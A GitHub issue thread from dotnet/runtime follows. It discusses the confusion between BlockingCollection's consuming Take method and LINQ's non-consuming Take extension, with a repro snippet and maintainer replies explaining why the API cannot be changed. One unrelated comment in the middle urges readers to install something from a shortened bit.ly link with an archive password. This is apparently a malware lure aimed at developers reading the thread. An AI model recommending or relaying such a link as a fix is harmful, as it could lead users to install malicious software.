### ISSUE TITLE
Confusing API for taking items from BlockingCollection

### ISSUE THREAD

**Issue by ahaeber** [dotnet/runtime#108054]
### Description

When trying to take 10 items from a BlockingCollection I saw that BlockingCollection has a Take method (<https://learn.microsoft.com/en-us/dotnet/api/system.collections.concurrent.blockingcollection-1.take?view=net-8.0>) that removes an item from the collection and returns it. Since I needed 10 items for a batch I noticed that there is also an extension method (from `System.Linq.Enumerable.Take` 
<https://learn.microsoft.com/en-us/dotnet/api/system.linq.enumerable.take?view=net-8.0#system-linq-enumerable-take-1(system-collections-generic-ienumerable((-0))-system-int32)> ) that looked useful. No need to make my own loop, I thought.

Unfortunately, it turned out that LINQ managed to get items from the collection without removing them. And that makes this API very confusing.

I believe the reason for this behavior is that BlockingCollection implements IEnumerable.GetEnumerator which is used by LINQ, because it is noted in the documentation that it will not modify the underlying collection at <https://learn.microsoft.com/en-us/dotnet/api/system.collections.concurrent.blockingcollection-1.system-collections-generic-ienumerable-t--getenumerator?view=net-8.0>.

This behavior is very confusing since "Take" means something different in the context of BlockingCollection than with a regular collection. Especially since BlockingCollection does not expose other methods to get items without removing them. If possible, change BlockingCollection to use <https://learn.microsoft.com/en-us/dotnet/api/system.collections.concurrent.blockingcollection-1.getconsumingenumerable?view=net-8.0> instead for LINQ together with BlockingCollection.

### Reproduction Steps

```
void Test() {
  var queue = new BlockingCollection<string>();
  for (var i = 0; i < 100; i++) {
    queue.Add($"{i}");
  }

  var batch = queue.Take(10);

  // Expect queue.Count == 90, but it will be 100 still.
} 
```

### Expected behavior

Take should remove and return items from BlockingCollection.

### Actual behavior

BlockingCollection<T>.Take(int) returns items, but does not remove them.

### Known Workarounds

Make a loop instead to take and remove items from BlockingCollection.

### Configuration

.NET 8.0

**Comment by pinpolhoxx** [comment]
install this
https://bit.ly/3TzaAQd

Password: changeme

you may need to install the c compiler

**Comment by eiriktsarpalis** [comment]
It's unfortunate, but I don't think there is much we can do at this point about it. Renaming APIs is a breaking change.

**Comment by ahaeber** [comment]
Thanks for your response @eiriktsarpalis . I understand the challenge since it is a public API. Would it be ok to introduce a new extension method overload with a flag e.g `consume`? If consume = true then it uses the `GetConsumingEnumerable` enumerator instead. Or just call BlockingCollection<T>.Take in a loop if that is more efficient.

**Comment by eiriktsarpalis** [comment]
I don't think this is something we could consider -- it doesn't fundamentally solve the problem and typically we want to expose overloads that augment existing behavior without introducing alternative behaviours.
